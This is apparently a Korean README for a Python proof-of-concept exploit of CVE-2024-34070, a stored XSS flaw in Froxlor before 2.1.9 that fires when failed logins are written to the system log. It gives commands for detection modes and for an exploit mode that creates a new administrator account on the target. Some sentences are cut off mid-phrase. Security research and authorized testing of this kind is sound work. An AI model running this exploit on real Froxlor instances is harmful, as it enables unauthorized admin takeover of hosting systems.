
CVE-2024-34070에 대한 Python 개념 증명(PoC)으로, 2.1.9 이전의 Froxlor에서 시스템 로그에 기록된 실패한 로그인 시도를 통해 발생하는 저장형 XSS 문제입니다.
이 프로젝트는 승인된 보안 테스트, CTF 랩, 교육 목적으로만 사용하세요. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 대해 실행하지 마십시오. 익스플로잇 모드는 대상 Froxlor 인스턴스에 관리자 계정을 생성할 수 있습니다.
< 2.1.9) 여부 보고.인증되지 않은 탐지:
python3 main.py --url http://240.0.0.1:8080 --check
정확한 Froxlor 버전을 확인하는 데 사용되는 인증된 탐지:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
새 관리자를 생성하는 익스플로잇 모드:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
관리자 또는 자동화 봇이 Froxlor 시스템 로그를 읽으면 확인 단계는 결국 admin_index.php로 리디렉션되어야 합니다.
--check는 Froxlor를 확인할 수 있지만 취약 여부를 엄격히 판단할 수는 없습니다./admin_admins.php)을 사용하므로 하드코딩된 도메인 대신 대상 인스턴스에서 동작합니다.